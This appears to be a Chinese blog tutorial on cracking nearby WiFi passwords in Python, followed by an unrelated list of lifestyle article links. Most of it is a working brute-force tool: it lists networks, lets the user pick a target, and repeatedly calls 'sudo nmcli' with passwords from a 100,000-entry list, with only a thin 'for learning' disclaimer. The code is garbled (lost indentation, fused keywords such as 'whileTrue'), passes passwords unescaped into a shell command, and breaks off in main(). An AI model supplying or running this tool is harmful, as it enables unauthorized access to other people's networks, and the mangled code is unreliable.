程序员宝藏库:https://github.com/Jackpopc/CS-Books-Store
WiFi现在已经遍布我们生活方方面面,如今,如论到工作单位,还是租住的房子,或者一家餐厅,随处都可以连上WiFi 。
因此,我们对WiFi密码的需求也没有之前那么迫切了 。
如何破解WiFi密码?
本文,将会通过Python教大家如何实现,这里纯粹是为了学习用途 。
1. WiFi列表
首先,我们需要获取附近的WiFi列表 。
下面,就来写一个函数来获取附近的WiFi列表,函数命名为display_targets:
def display_targets(networks, security_type):
print("Select a target: \\n")
rows, columns = os.popen('stty size', 'r').read().split()
for i in range(len(networks)):
width = len(str(str(i+1)+". "+networks[i]+security_type[i]))+2
spacer = " "
if (int(columns) >= 100):
calc = int((int(columns)-int(width))*0.75)
else:
calc = int(columns)-int(width)
for index in range(calc):
spacer += "."
if index == (calc-1):
spacer += " "
print(str(i+1)+". "+networks[i]+spacer+security_type[i])
这里,我们会用到ssid工具包,用来获取附近的WiFi列表,存入到参数networks 。
2. 选择WiFi
获取WiFi列表之后,下一步要做的就是选择我们想要连接的WiFi,
def prompt_for_target_choice(max):
whileTrue:
try:
selected = int(input("\\nEnter number of target: "))
if(selected >= 1and selected <= max):
return selected – 1
except Exception as e:
ignore = e
print("Invalid choice: Please pick a number between 1 and " + str(max))
这里很简单,就是一些通用的Python功能 。
3. 暴力破解
目前已经获取并且选择了想要连接的WiFi,那么如何获取到它的密码呢?
这里要用到一种比较常见的方式:暴力破解 。
这里,要用到Github上一个项目,它收集了最常用的10万个WiFi密码 。我们就用着10万个密码暴力解锁WiFi即可 。
def brute_force(selected_network, passwords, args):
for password in passwords:
# necessary due to NetworkManager restart after unsuccessful attempt at login
password = password.strip()
# when when obtain password from url we need the decode utf-8 however we doesnt when reading from file
if isinstance(password, str):
decoded_line = password
else:
decoded_line = password.decode("utf-8")
if args.verbose isTrue:
print(bcolors.HEADER+"** TESTING **: with password '" +
decoded_line+"'"+bcolors.ENDC)
if (len(decoded_line) >= 8):
time.sleep(3)
creds = os.popen("sudo nmcli dev wifi connect " +
selected_network+" password "+decoded_line).read()
# print(creds)
if ("Error:"in creds.strip()):
if args.verbose isTrue:
print(bcolors.FAIL+"** TESTING **: password '" +
decoded_line+"' failed."+bcolors.ENDC)
else:
sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" +
decoded_line+"' succeeded."+bcolors.ENDC)
else:
if args.verbose isTrue:
print(bcolors.OKCYAN+"** TESTING **: password '" +
decoded_line+"' too short, passing."+bcolors.ENDC)
print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)
核心功能3个函数就完成了,只用了60行Python代码!
下面就把它们串联在一起:
def main():
require_root()
args = argument_parser()
# The user chose to supplied their own url
推荐阅读
- 男士最想亲吻的三种唇妆公开
- 底妆素颜风 最流行的粉底涂抹法
- 诺基亚智能机解锁方法 诺基亚最新智能机
- 2021最新武汉大学旅游攻略
- 米色派克服搭配什么最好看
- 最简单护肤法搞定男人面子问题
- 粮食警报再次响起:全球谷物库存将到达八年来最低点!
- 杨梅酒多久喝最好呢 杨梅泡酒多久喝最好
- 全国今日猪价价格表4月12号
- 欧文最经典一句名言